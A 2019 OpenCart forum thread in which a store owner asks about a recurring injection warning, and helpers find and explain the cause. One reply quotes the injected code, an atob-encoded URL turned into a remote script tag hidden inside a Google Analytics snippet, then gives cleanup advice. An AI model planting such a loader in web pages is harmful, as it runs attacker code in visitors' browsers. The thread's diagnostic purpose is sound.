Post by rhorne » Thu Aug 08, 2019 8:40 pm

We run an online store, here: https://tinyurl.com/yxv2z9p4

Whenever I've done malware scans or error checking it generally passes without issue, but occasionally I see mention of a possible injection attack. And it's always this same js file: https://www.jctfinancial.com/wp-content ... plugins.js

See the below scan results for confirmation:

https://rescan.pro/result.php?5c246c4ba ... dc0e071ed3

I've tried browsing the site in Firefox using debug mode and it too shows a warning against this. However, I can't find which of the files on my site contains any links to this. I've done a search on the contents of a full backup of the site and can't find any files containing that URL and I can't see how in Firefox it's possible to determine where that link is coming from.

If anyone can shed any light I'd be very grateful.

Opencart 2.3.0.2. Journal 2 template.

Active Member

Posts

Joined
Wed Jan 18, 2012 3:07 am

Post by IP_CAM » Thu Aug 08, 2019 9:13 pm

Well, this topic seems to have been cleared out already, but that's, what it takes
for Journal, to make an OpenCart Software work. :crazy: :choke:
Image
---
But you also seem to use Wordpress on the same Site, and that makes it even more
dangerous. But I also recall an insecure Journal-2 Edition to be mentioned a while
ago, so, better get a professional, because nobody else would be able or willing, to
assist in such an installation.
Good Luck ...
Ernie

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.


User avatar
Legendary Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland

Post by rhorne » Thu Aug 08, 2019 10:16 pm

I'm confused. Your screenshot doesn't give me any clues. Yes there are lots of JS files but none of them that I can see link to that website.

Active Member

Posts

Joined
Wed Jan 18, 2012 3:07 am

Post by IP_CAM » Thu Aug 08, 2019 11:01 pm

Well, I just wanted to point out, why so many don't like Journal Themes,
since that kind of Coding is far from the 'regular' way of 'handling' OC.
Still, your problem is not directly related to OC, it's a Wordpress Hack, as it
looks, doing bad things to your Site.
Ernie

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.


User avatar
Legendary Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland

Post by rhorne » Thu Aug 08, 2019 11:31 pm

Thanks for the reply Ernie.

I don't use Wordpress on that domain so what is suggesting that I am?

Active Member

Posts

Joined
Wed Jan 18, 2012 3:07 am

Post by ADD Creative » Thu Aug 08, 2019 11:46 pm

It's these two lines of code. It's decoding the URL and then adding the script to the page.

Code: Select all

  var api_service = atob('aHR0cHM6Ly93d3cuamN0ZmluYW5jaWFsLmNvbS93cC1jb250ZW50L3BsdWdpbnMvcGx1Z2lucy5qcw==');
  var api = document.createElement('script');api.src = api_service;document.head.appendChild(api);
It appears in you Google Analytics code.

Code: Select all

<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-34406391-6"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  var api_service = atob('aHR0cHM6Ly93d3cuamN0ZmluYW5jaWFsLmNvbS93cC1jb250ZW50L3BsdWdpbnMvcGx1Z2lucy5qcw==');
  var api = document.createElement('script');api.src = api_service;document.head.appendChild(api);

  gtag('js', new Date());

  gtag('config', 'UA-34406391-6');
</script>
You need to remove the code and fix your Google Analytics code. I would also recommend you check if your theme has and updates that may have security patches. Also change all your passwords, such as all OpenCart admin logins, all hosting control panel logins, all FTP account, etc.

www.add-creative.co.uk


Expert Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom

Post by Elevate » Thu Aug 08, 2019 11:49 pm

rhorne wrote:
Thu Aug 08, 2019 11:31 pm
Thanks for the reply Ernie.

I don't use Wordpress on that domain so what is suggesting that I am?
Even though you're not running a Wordpress site, this implies that there are still WP files uploded to the server. Is that the case? Hackers don't care whether or not you're actually running a WP site. They just want to find files and hack them so the malicious code gets executed and spread around.

ELEV8TE Website Development
https://www.elev8your.com


User avatar
New member

Posts

Joined
Fri Jul 06, 2018 12:40 am
Location - Denver, Colorado, USA

Post by IP_CAM » Fri Aug 09, 2019 2:42 am

Hackers don't care whether or not you're actually running a WP site.
That's correct ! And hacking Attempts on OC Sites are not uncommon, I frequently
redirect such Calls, by use of a fine 1.5.x Extension, as you can see on the image below. :D
Ernie
---
Image

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.


User avatar
Legendary Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland

Post by rhorne » Fri Aug 09, 2019 3:24 pm

Thanks for your replies guys. I'll update the Google Analytics code and themes etc and change all passwords immediately. :)

Active Member

Posts

Joined
Wed Jan 18, 2012 3:07 am

Post by wrick0 » Fri Aug 09, 2019 4:02 pm

Make sure your host has modsecurity installed which can block most of the sql attacks

Active Member

Posts

Joined
Fri Jan 18, 2019 10:00 pm
Location - 127.0.0.1 @ The Netherlands
Who is online

Users browsing this forum: No registered users and 33 guests